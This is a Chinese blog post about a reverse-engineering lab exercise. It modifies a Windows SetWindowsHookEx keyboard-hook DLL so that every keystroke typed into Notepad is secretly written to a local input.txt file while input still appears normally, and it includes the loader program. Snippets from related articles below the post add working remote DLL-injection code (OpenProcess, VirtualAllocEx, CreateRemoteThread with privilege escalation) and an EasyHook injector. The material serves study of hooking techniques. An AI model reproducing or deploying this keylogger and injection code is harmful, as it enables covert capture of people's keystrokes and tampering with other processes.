DLL注入实验-DLL消息钩取HOOK

最新推荐文章于 2023-06-13 23:23:49 发布
最新推荐文章于 2023-06-13 23:23:49 发布
阅读量938 收藏 7
点赞数 1
分类专栏: 软件逆向 文章标签: 软件逆向 DLL HOOK
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41026219/article/details/103040864
版权

软件逆向工程-dll消息钩取

DLL注入实验-dll消息钩取HOOK

Assignment

修改改HookDll.cpp,钩取对notepad的输入,使得:
a)输入文本仍能正常显示
b)所有输入文本能够记录到input.txt文件中

HookDll.cpp

#include "windows.h"
#include "tchar.h"

HINSTANCE g_hInstance = NULL;
HHOOK g_hHook = NULL;

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
	switch( dwReason ){
        case DLL_PROCESS_ATTACH:
			g_hInstance = hinstDLL;
			break;
	}
	return TRUE;
}

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam){
	TCHAR szPath[MAX_PATH] = {0,};
	TCHAR *p = NULL;

	if( nCode >= 0 ) {
		if( !(lParam & 0x80000000) ){ //lParam的第31位(0:按键;1:释放键)
			GetModuleFileName(NULL, szPath, MAX_PATH);
			p = _tcsrchr(szPath, _T('\\'));
            //若装载当前DLL的进程为notepad.exe,则消息不会传递给下一个钩子
			if( !lstrcmpi(p + 1, _T("notepad.exe")) )
				return 1;
		}
	}
    // 当前进程不是notepad.exe,将消息传递给下一个钩子
	return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}

#ifdef __cplusplus
extern "C" {
#endif
	__declspec(dllexport) void HkStart() {
		g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstance, 0);
	}

	__declspec(dllexport) void HkStop() {
		if( g_hHook ) {
			UnhookWindowsHookEx(g_hHook);
			g_hHook = NULL;
		}
	}
#ifdef __cplusplus
}
#endif

j使用vs2017编译生成dll,程序作用:钩取notepad(记事本)的消息输入。不过这是notepad不能正常输入,也不能记录钩取的数据,关键代码都有注释。

OS消息队列和应用程序消息队列之间存在一条钩链(Hook Chain),设置好键盘消息钩子后,处于钩链中的键盘消息钩子会比应用程序先一步看到相应信息。在键盘消息钩子函数的内部,除了可以查看消息之外,还可以修改消息本身,而且还能对消息实施拦截,阻止消息传递。可以同时设置多个相同的键盘消息钩子,按照设置的顺序依次调用,从而组成的链条称为钩链。
在这里插入图片描述

TsetHook.cpp

#include "stdio.h"
#include "windows.h"
#include "tchar.h"

typedef void (*PFN_HOOKSTART)();
typedef void (*PFN_HOOKSTOP)();

int _tmain(int argc, TCHAR* argv[]) {
	HMODULE	hDll = NULL;
	if( (hDll = LoadLibraryA("HookDll.dll")) == NULL )// 装载HookDll.dll
		return FALSE;

	// 获取导出函数HkStart()和HkStop()的地址
	PFN_HOOKSTART HookStart = (PFN_HOOKSTART)GetProcAddress(hDll, "HkStart");
	PFN_HOOKSTOP HookStop = (PFN_HOOKSTOP)GetProcAddress(hDll, "HkStop");

	HookStart(); //开始钩取键盘消息
	_tprintf(_T("press 'q' to quit!\n"));
	while( getchar() != 'q' ); // 等到用户输入'q'才终止钩取
	HookStop(); //终止钩取键盘消息
	FreeLibrary(hDll); //卸载HookDll.dll
	return TRUE;
}

其中TestDll主要是进行HookDll.dll的装载与卸载,获取HkStart HkStop的地址,并且使用q来判断用户输入是否终止。

修改dll实现功能

CODE C++

// dllmain.cpp : 定义 DLL 应用程序的入口点。   //hookdll1 钩取notepad的输入 同时不影响正常输入 并把输入保存到指定的txt
#define _CRT_SECURE_NO_WARNINGS

#include "stdafx.h"
#include "windows.h"
#include "tchar.h"
#include <stdio.h>

//
HINSTANCE g_hInstance = NULL;
HHOOK g_hHook = NULL;

//dllmain
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved) {
   switch (dwReason) {
   //当DLLMain处理DLL_PROCESS_ATTACH时,DLLMain函数的返回值表示DLL的初始化是否成功。成功返回TRUE,否则返回FALSE。
   case DLL_PROCESS_ATTACH:
   	g_hInstance = hinstDLL;
   	break;
   }
   return TRUE;
}
//keyboardproc
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
   TCHAR szPath[MAX_PATH] = { 0, };
   TCHAR *p = NULL;
   FILE *fp = NULL;

   if ((fp = fopen("C:test\\input.txt", "a+"))==NULL) {//保存输入的txt
   	printf("open txt error");
   }
   
   if (nCode >= 0) {//nCode 钩子识别码
   	if (!(lParam & 0x80000000)) { //lParam的第31位(0:按键;1:释放键)
   		GetModuleFileName(NULL, szPath, MAX_PATH);
   		p = _tcsrchr(szPath, _T('\\'));//当前路径\\后的内容(notepad.exe)

   		//若装载当前DLL的进程为notepad.exe
   		if (!lstrcmpi(p + 1, _T("notepad.exe")))//为notepad程序
   		{
   			char c = wParam;//获取消息
   			fwrite(&c, 1, 1, fp);//一字节一元素写入
   			CallNextHookEx(g_hHook, nCode, wParam, lParam);//使文字正常输入
   			//return 1;//这个要注释掉
   		}
   	}
   	fclose(fp);
   }
   // 当前进程不是notepad.exe,将消息传递给下一个钩子
   return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}

#ifdef __cplusplus
extern "C" {
#endif
   __declspec(dllexport) void HkStart() {
   	g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstance, 0);//sethook开启
   }

   __declspec(dllexport) void HkStop() {
   	if (g_hHook) {
   		UnhookWindowsHookEx(g_hHook);//unhook关闭
   		g_hHook = NULL;
   	}
   }
#ifdef __cplusplus
}
#endif

实现

在这里插入图片描述
在这里插入图片描述

PS 关于vs如何使用ddl 参考https://blog.csdn.net/qq_37902078/article/details/80144696
windows钩取 https://blog.csdn.net/SKI_12/article/details/80684358

Xbing0.
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DLL注入测试工具
06-03
给定一个进程名称,获得当前进程系统中有该进程的实例(以PID列表形式),并给定一组DLL名称,检测DLL是否成功注入目标进程中。
调试注入dll+API-Hook.zip
11-18
// 判断异常记录的内容是否是断点异常(断点异常里面包括int3异常) if (EXCEPTION_BREAKPOINT == per->ExceptionCode) { // 判断断点地址是否为WriteFile()API地址 if (g_pfWriteFile == per->...
Dll注入经典方法完整版
weixin_34112030的博客
03-13 533
Pnig0s1992:算是复习了,最经典的教科书式的Dll注入。 总结一下基本的注入过程,分注入和卸载 注入Dll: 1,OpenProcess获得要注入进程的句柄 2,VirtualAllocEx在远程进程中开辟出一段内存,长度为strlen(dllname)+1; 3,WriteProcessMemory将Dll的名字写入第二步开辟出的内存中。 4,Cre...
DLL注入windows消息钩取
weixin_30607659的博客
11-13 482
DLL注入windows消息钩取 0x00 通过Windows消息钩取 通过Windows消息钩取可以使用SetWindowsHookEx。该函数的原型如下: SetWindowsHookEx( __in int idHook, \\钩子类型 __in HOOKPROC lpfn, \\回调函数地址 __in HINSTANCE hMod, \\实例句柄 __in DWORD...
dll注入实验
Shanfenglan's blog
07-06 626
文章目录目的流程写一个dlldll注入参考文章 目的 让我们的dll程序加载在其他已经运行的程序中。 流程 1.提权到管理员权限,需要bypassuac。 2.根据目标进程的pid使用OpenProcess函数得到进程句柄 3.根据进程句柄在目标进程中申请内存VirtualAllocEx 4.在目标进程中刚刚申请的内存空间中写入所需参数(Dll的完整路径)WriteProcessMemory 5.用GetProcAddress得到LoadLibraryW的模块加载地址 6.启动远程线程CreateRemot
windows简单消息勾取和dll注入
九层台
10-03 839
来源《逆向工程核心原理》 运行notepad.exe可以劫持notepad.exe的键盘输入 HookMain.cpp //HookMain.cpp #include&quot;stdio.h&quot; #include&quot;conio.h&quot; #include&quot;windows.h&quot; #define DEF_DLL_NAME &quot;HookKey.dll&quot; #define DEF_HOOKS
dll注入Hook
11-08
DLL注入Hook技术是Windows操作系统中常见的编程技巧,主要用于系统调试、性能监控、安全分析以及恶意软件活动。本文将深入探讨这两个概念,以及如何在实践中实施它们。 首先,我们需要了解DLL(动态链接库)。DLL...
vc++ dll注入api hook.zip
02-28
在IT领域,DLL注入和API Hook是两种高级的编程技术,通常用于系统监控、调试以及安全测试。在“vc++ dll注入api hook.zip”这个压缩包中,包含了实现这两种技术的相关源代码,如`apihijack.cpp`、`apihijack.h`以及...
DLL注入源码-HOOK技术
09-03
在这个压缩包文件中,我们很可能会找到一个关于DLL注入的简单示例源码,以及相关的HOOK技术。 DLL注入的基本流程包括以下步骤: 1. **创建DLL**:首先,你需要编写一个动态链接库(DLL),其中包含你想要在目标...
易语言远程DLL注入源码-易语言
06-13
易语言远程DLL注入源码是一种在编程领域中用于实现远程控制、监控或者调试的技术,它涉及到Windows操作系统底层的进程通信和动态链接库(DLL)的加载机制。在本例中,"易语言"是一种中国本土开发的编程语言,旨在...
DLL注入实例+教程
10-17
远程注入DLL方法有很多种,也是很多木马病毒所使用的隐藏进程的方法,因为通过程序加载的DLL在进程管理器是没有显示的.这里介绍一种用 CreateRemoteThread 远程建立线程的方式注入DLL. 首先,我们要提升自己的权限,因为远程注入必不可免的要访问到目标进程的内存空间,如果没有足够的系统权限,将无法作任何事.下面是这个函数是用来提升我们想要的权限用的. function EnableDebugPriv: Boolean; var hToken: THandle; tp: TTokenPrivileges; rl: Cardinal; begin Result := false; //打开进程令牌环 OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken); //获得进程本地唯一ID if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then begin tp.PrivilegeCount := 1; tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; //调整权限 Result := AdjustTokenPrivileges(hToken, false, tp, SizeOf(tp), nil, rl); end; end; 关于 OpenProcessToken() 和 AdjustTokenPrivileges() 两个 API 的简单介绍: OpenProcessToken():获得进程访问令牌的句柄. function OpenProcessToken( ProcessHandle: THandle; //要修改访问权限的进程句柄 DesiredAccess: DWORD; //指定你要进行的操作类型 var TokenHandle: THandle//返回的访问令牌指针 ): BOOL; AdjustTokenPrivileges() :调整进程的权限. function AdjustTokenPrivileges( TokenHandle: THandle; // 访问令牌的句柄 DisableAllPrivileges: BOOL; // 决定是进行权限修改还是除能(Disable)所有权限 const NewState: TTokenPrivileges; { 指明要修改的权限,是一个指向TOKEN_PRIVILEGES结构的指针,该结构包含一个数组, 数据组的每个项指明了权限的类型和要进行的操作; } BufferLength: DWORD; //结构PreviousState的长度,如果PreviousState为空,该参数应为 0 var PreviousState: TTokenPrivileges; // 指向TOKEN_PRIVILEGES结构的指针,存放修改前的访问权限的信息 var ReturnLength: DWORD //实际PreviousState结构返回的大小 ) : BOOL; 远程注入DLL其实是通过 CreateRemoteThread 建立一个远程线程调用 LoadLibrary 函数来加载我们指定的DLL,可是如何能让远程线程知道我要加载DLL呢,要知道在Win32系统下,每个进程都拥有自己的4G虚拟地址空间,各个进程之间都是相互独立的。所我们需要在远程进程的内存空间里申请一块内存空间,写入我们的需要注入DLL 的路径. 需要用到的 API 函数有: OpenProcess():打开目标进程,得到目标进程的操作权限,详细参看MSDN function OpenProcess( dwDesiredAccess: DWORD; // 希望获得的访问权限 bInheritHandle: BOOL; // 指明是否希望所获得的句柄可以继承 dwProcessId: DWORD // 要访问的进程ID ): THandle; VirtualAllocEx():用于在目标进程内存空间中申请内存空间以写入DLL的文件名 function VirtualAllocEx( hProcess: THandle; // 申请内存所在的进程句柄 lpAddress: Pointer; // 保留页面的内存地址;一般用nil自动分配 dwSize, // 欲分配的内存大小,字节单位;注意实际分 配的内存大小是页内存大小的整数倍 flAllocationType: DWORD; flProtect: DWORD ): Pointer; WriteProcessMemory():往申请到的空间中写入DLL的文件名 function WriteProcessMemory( hProcess: THandle; //要写入内存数据的目标进程句柄 const lpBaseAddress: Pointer; //要写入的目标进程的内存指针, 需以 VirtualAllocEx() 来申请 lpBuffer: Pointer; //要写入的数据 nSize: DWORD; //写入数据的大小 var lpNumberOfBytesWritten: DWORD //实际写入的大小 ): BOOL; 然后就可以调用 CreateRemoteThread 建立远程线程调用 LoadLibrary 函数来加载我们指定的DLL. CreateRemoteThread() //在一个远程进程中建立线程 function CreateRemoteThread( hProcess: THandle; //远程进程的句柄 lpThreadAttributes: Pointer; //线程安全描述字,指向SECURITY_ATTRIBUTES结构的指针 dwStackSize: DWORD; //线程栈大小,以字节表示 lpStartAddress: TFNThreadStartRoutine; // 一个TFNThreadStartRoutine类型的指针,指向在远程进程中执行的函数地址 lpParameter: Pointer; //传入参数的指针 dwCreationFlags: DWORD; //创建线程的其它标志 var lpThreadId: DWORD //线程身份标志,如果为0, 则不返回 ): THandle; 整个远程注入DLL的具体实现代码如下: function InjectDll(const DllFullPath: string; const dwRemoteProcessId: Cardinal): Boolean; var hRemoteProcess, hRemoteThread: THandle; pszLibFileRemote: Pointer; pszLibAFilename: PwideChar; pfnStartAddr: TFNThreadStartRoutine; memSize, WriteSize, lpThreadId: Cardinal; begin Result := false; // 调整权限,使程序可以访问其他进程的内存空间 if EnableDebugPriv then begin //打开远程线程 PROCESS_ALL_ACCESS 参数表示打开所有的权限 hRemoteProcess := OpenProcess(PROCESS_ALL_ACCESS, false, dwRemoteProcessId); try // 为注入dll文件路径分配内存大小,由于为WideChar,故要乘2 GetMem(pszLibAFilename, Length(DllFullPath) * 2 + 1); // 之所以要转换成 WideChar, 是因为当DLL位于有中文字符的路径下时不会出错 StringToWideChar(DllFullPath, pszLibAFilename, Length(DllFullPath) * 2 + 1); // 计算 pszLibAFilename 的长度,注意,是以字节为单元的长度 memSize := (1 + lstrlenW(pszLibAFilename)) * SizeOf(WCHAR); //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间 pszLibFileRemote := VirtualAllocEx(hRemoteProcess, nil, memSize, MEM_COMMIT, PAGE_READWRITE); if Assigned(pszLibFileRemote) then begin //使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间 if WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, memSize, WriteSize) and (WriteSize = memSize) then begin lpThreadId := 0; // 计算LoadLibraryW的入口地址 pfnStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'LoadLibraryW'); // 启动远程线程LoadLbraryW,通过远程线程调用创建新的线程 hRemoteThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, lpThreadId); // 如果执行成功返回 True; if (hRemoteThread 0) then Result := true; // 释放句柄 CloseHandle(hRemoteThread); end; end; finally // 释放句柄 CloseHandle(hRemoteProcess); end; end; end; 接下来要说的是如何卸载注入目标进程中的DLL,其实原理和注入DLL是完全相同的,只是远程调用调用的函数不同而已,这里要调用的是FreeLibrary,代码如下: function UnInjectDll(const DllFullPath: string; const dwRemoteProcessId: Cardinal): Boolean; // 进程注入和取消注入其实都差不多,只是运行的函数不同而已 var hRemoteProcess, hRemoteThread: THandle; pszLibFileRemote: PChar; pszLibAFilename: PwideChar; pfnStartAddr: TFNThreadStartRoutine; memSize, WriteSize, lpThreadId, dwHandle: Cardinal; begin Result := false; // 调整权限,使程序可以访问其他进程的内存空间 if EnableDebugPriv then begin //打开远程线程 PROCESS_ALL_ACCESS 参数表示打开所有的权限 hRemoteProcess := OpenProcess(PROCESS_ALL_ACCESS, false, dwRemoteProcessId); try // 为注入dll文件路径分配内存大小,由于为WideChar,故要乘2 GetMem(pszLibAFilename, Length(DllFullPath) * 2 + 1); // 之所以要转换成 WideChar, 是因为当DLL位于有中文字符的路径下时不会出错 StringToWideChar(DllFullPath, pszLibAFilename, Length(DllFullPath) * 2 + 1); // 计算 pszLibAFilename 的长度,注意,是以字节为单元的长度 memSize := (1 + lstrlenW(pszLibAFilename)) * SizeOf(WCHAR); //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间 pszLibFileRemote := VirtualAllocEx(hRemoteProcess, nil, memSize, MEM_COMMIT, PAGE_READWRITE); if Assigned(pszLibFileRemote) then begin //使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间 if WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, memSize, WriteSize) and (WriteSize = memSize) then begin // 计算GetModuleHandleW的入口地址 pfnStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'GetModuleHandleW'); //使目标进程调用GetModuleHandleW,获得DLL在目标进程中的句柄 hRemoteThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, lpThreadId); // 等待GetModuleHandle运行完毕 WaitForSingleObject(hRemoteThread, INFINITE); // 获得GetModuleHandle的返回值,存在dwHandle变量中 GetExitCodeThread(hRemoteThread, dwHandle); // 计算FreeLibrary的入口地址 pfnStartAddr := GetProcAddress(LoadLibrary('Kernel32.dll'), 'FreeLibrary'); // 使目标进程调用FreeLibrary,卸载DLL hRemoteThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, Pointer(dwHandle), 0, lpThreadId); // 等待FreeLibrary卸载完毕 WaitForSingleObject(hRemoteThread, INFINITE); // 如果执行成功返回 True; if hRemoteProcess 0 then Result := true; // 释放目标进程中申请的空间 VirtualFreeEx(hRemoteProcess, pszLibFileRemote, Length(DllFullPath) + 1, MEM_DECOMMIT); // 释放句柄 CloseHandle(hRemoteThread); end; end; finally // 释放句柄 CloseHandle(hRemoteProcess); end; end; end;
钩子,hook来获取消息
06-08
\ 钩子获取windows消息
hook dll的工具的源代码(vc)
07-04
hook dll的工具的源代码(vc) hook dll的工具的源代码(vc)
HookAPI并且在Windows程序启动前注入dll (C++)
05-08
这是本人用C++ 在VS2019IDE 用控制台写的一个可以在程序启动前注入dllHook系统api的函数。Hook的是knernelbase的CreateProcessInternalW函数,希望对大家有帮助
EasyHook 函数钩子 最好的完整稳定的钩子Demo程序(VS2010 C++ 版本)
01-19
目前最好的EasyHook的完整Demo程序,包括了Hook.dll动态库和Inject.exe注入程序。 Hook.dll动态库封装了一套稳定的下钩子的机制,以后对函数下钩子,只需要填下数组表格就能实现了,极大的方便了今后的使用。 Inject.exe部分是用MFC写的界面程序,只需要在界面上输入进程ID就能正确的HOOK上相应的进程,操作起来非常的简便。 这个Demo的代码风格也非常的好,用VS2010成功稳定编译通过,非常值得下载使用。 部分代码片段摘录如下: //【Inject.exe注入程序的代码片段】 void CInjectHelperDlg::OnBnClickedButtonInjectDllProcessId() { ////////////////////////////////////////////////////////////////////////// //【得到进程ID值】 UINT nProcessID = 0; if (!GetProcessID(nProcessID)) { TRACE(_T("%s GetProcessID 失败"), __FUNCTION__); return; } ////////////////////////////////////////////////////////////////////////// //【得到DLL完整路径】 CString strPathDLL; if (!GetDllFilePath(strPathDLL)) { TRACE(_T("%s GetDllFilePath 失败"), __FUNCTION__); return; } ////////////////////////////////////////////////////////////////////////// //【注入DLL】 NTSTATUS ntStatus = RhInjectLibrary(nProcessID, 0, EASYHOOK_INJECT_DEFAULT, strPathDLL.GetBuffer(0), NULL, NULL, 0); if (!ShowStatusInfo(ntStatus)) { TRACE(_T("%s ShowStatusInfo 失败"), __FUNCTION__); return; } } //【Hook.dll动态库的代码片段】 extern "C" __declspec(dllexport) void __stdcall NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* InRemoteInfo) { if (!DylibMain()) { TRACE(_T("%s DylibMain 失败"), __FUNCTION__); return; } } FUNCTIONOLDNEW_FRMOSYMBOL array_stFUNCTIONOLDNEW_FRMOSYMBOL[]= { {_T("kernel32"), "CreateFileW", (void*)CreateFileW_new}, {_T("kernel32"), "CreateFileA", (void*)CreateFileA_new}, {_T("kernel32"), "ReadFile", (void*)ReadFile_new} }; BOOL HookFunctionArrayBySymbol() { /////////////////////////////////////////////////////////////// int nPos = 0; do { /////////////////////////////// FUNCTIONOLDNEW_FRMOSYMBOL* stFunctionOldNew = &g_stFUNCTIONOLDNEW_FRMOSYMBOL[nPos]; if (NULL == stFunctionOldNew->strModulePath) { break; } /////////////////////////////// if (!HookFunctionBySymbol(stFunctionOldNew->strModulePath, stFunctionOldNew->strNameFunction, stFunctionOldNew->pFunction_New)) { TRACE(_T("%s HookFunctionBySymbol 失败"), __FUNCTION__); return FALSE; } } while(++nPos); /////////////////////////////////////////////////////////////// return TRUE; } HANDLE WINAPI CreateFileW_new( PWCHAR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ) { TRACE(_T("CreateFileW_new. lpFileName = %s"), lpFileName); return CreateFileW( lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile); }
DLL注入实践
weixin_30922589的博客
07-18 258
Windows系统大量使用dll作为组件复用,应用程序也会通过dll实现功能模块的拆分。DLL注入技术是向一个正在运行的进程插入自有DLL的过程。 Window下的代码注入 常见的Windows代码注入方法如下: 注册表注入 编译注册表中的AppInit_DLLs选项,凡是使用GUI的进程,都会读取AppInit_DLLs内容,加载这些DllWindows Hook注入 使用 SetWind...
QueueUserApc实现DLL注入的测试
Lassewang的成长历程
05-03 1403
Code highlighting produced by Actipro CodeHighlighter (freeware)http://www.CodeHighlighter.com/-->#include "stdafx.h" #define _WIN32_WINNT 0x0400 #define WIN32_LEAN_AND_MEAN // 从 Windows 头中排除极少使用的资料
DLL注入实验笔记
pDaren的专栏
08-20 783
MSDN已经说明了DllMain可以省略,但这里不能省略。原因很简单,查看DllMain定义的形参就知道是什么回事啦。当应用程序加载DLL时会发送消息DllMain函数的第二个参数。利用这个特性,加载的DLL就可以立刻响应里面的功能函数啦!!下面是实验的代码:#include DWORD WINAPI ThreadProc(PVOID lp); BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpRese
hook32dll
最新发布
yunteng521的博客
06-13 197
hook32dll 32位 windows dll hook
DLL注入HOOK技术在数据采集分析中的应用
"这篇毕业设计论文探讨了基于DLL注入HOOK技术的数据采集与分析,主要关注如何利用这些技术来获取和解析系统数据。" 正文: 在计算机编程领域,DLL(动态链接库)和HOOK技术是两种强大的工具,它们允许程序员在不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值